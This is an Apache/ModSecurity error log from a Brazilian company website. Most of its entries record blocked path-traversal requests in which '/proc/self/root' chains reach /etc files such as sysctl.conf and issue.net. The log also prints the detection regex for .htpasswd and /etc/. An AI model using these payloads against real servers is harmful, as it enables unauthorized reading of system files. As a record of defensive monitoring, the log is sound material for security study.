[Fri Mar 20 05:14:18.201076 2026] [:error] [pid 26799:tid 140411557287680] [client 74.7.241.31:41676] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0B2ta6ubjKNq_cu4awsAAAA1Y"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 05:14:22.395797 2026] [:error] [pid 26799:tid 140411632822016] [client 74.7.241.31:41676] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0B3ta6ubjKNq_cu4awuQAAA00"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 05:14:25.859044 2026] [:error] [pid 15826:tid 140411725141760] [client 74.7.241.31:56506] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0B4eoXxyEfFpUF8f9howAAAUI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 05:14:49.233125 2026] [:error] [pid 11167:tid 140411666392832] [client 74.7.243.128:53270] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0B-fHIg5MgXLBnicPZZAAAAck"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 05:16:55.513273 2026] [:error] [pid 11642:tid 140411733534464] [client 74.7.243.128:33552] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Cd7ninkcc-iUj5Ao-QQAAA4E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 05:19:17.984140 2026] [access_compat:error] [pid 15826:tid 140411741927168] [client 192.141.115.126:48140] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Fri Mar 20 05:19:29.465893 2026] [mime_magic:error] [pid 7893:tid 140411741927168] (70014)End of file found: [client 57.141.18.11:58220] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 05:20:51.056013 2026] [:error] [pid 31215:tid 140411683178240] [client 74.7.241.31:38984] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/sysctl.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0DYwF0L0L-SsrnPo5I2wAAAsc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 05:20:51.888797 2026] [:error] [pid 15826:tid 140411540502272] [client 74.7.241.31:37980] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0DY-oXxyEfFpUF8f9ilAAAAVg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 05:20:57.782856 2026] [access_compat:error] [pid 10189:tid 140411649607424] [client 212.58.102.186:12324] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Fri Mar 20 05:20:59.101084 2026] [:error] [pid 7235:tid 140411725141760] [client 74.7.243.128:44060] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Da_qxLDW4GITHUkTDbAAAAQI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 05:21:05.988706 2026] [:error] [pid 21219:tid 140411708356352] [client 74.7.243.128:45166] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0DcfXLqtnMIWvjpaJ6XwAAAoQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 05:21:07.314977 2026] [:error] [pid 11167:tid 140411565680384] [client 74.7.243.128:45168] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Dc_HIg5MgXLBnicPaMgAAAdU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 05:22:21.664768 2026] [:error] [pid 11642:tid 140411590858496] [client 74.7.243.128:45172] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Dvbninkcc-iUj5Ao_VwAAA5I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 05:22:27.143162 2026] [:error] [pid 15826:tid 140411624429312] [client 74.7.243.128:43410] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Dw-oXxyEfFpUF8f9ivQAAAU4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 05:22:29.601459 2026] [:error] [pid 15826:tid 140411632822016] [client 74.7.243.128:43422] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0DxeoXxyEfFpUF8f9iwwAAAU0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 05:22:51.793417 2026] [:error] [pid 10189:tid 140411741927168] [client 74.7.243.128:43576] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0D2zJ3M9BSuKP7CAbz7wAAAIA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 05:25:25.996610 2026] [:error] [pid 11167:tid 140411649607424] [client 74.7.243.128:48952] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0EdfHIg5MgXLBnicPatgAAAcs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 05:25:35.835216 2026] [:error] [pid 10189:tid 140411658000128] [client 74.7.243.128:42286] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0EfzJ3M9BSuKP7CAb0SAAAAIo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 05:25:43.952894 2026] [:error] [pid 9818:tid 140411565680384] [client 74.7.243.128:47756] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Eh11pVZ5mVmJwsFMQxQAAAFU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 05:27:19.125116 2026] [:error] [pid 26799:tid 140411540502272] [client 74.7.243.128:43584] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0E5ta6ubjKNq_cu4azEAAAA1g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 05:27:21.675744 2026] [:error] [pid 9818:tid 140411733534464] [client 74.7.243.128:37494] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0E6F1pVZ5mVmJwsFMQ9AAAAEE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 05:27:38.239363 2026] [:error] [pid 15826:tid 140411641214720] [client 74.7.243.128:37496] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0E-uoXxyEfFpUF8f9jZgAAAUw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 05:27:39.369124 2026] [mime_magic:error] [pid 11642:tid 140411557287680] (70014)End of file found: [client 57.141.18.78:46230] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 05:28:17.236486 2026] [:error] [pid 21219:tid 140411725141760] [client 74.7.241.31:34972] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0FIfXLqtnMIWvjpaJ8BwAAAoI"], referer: 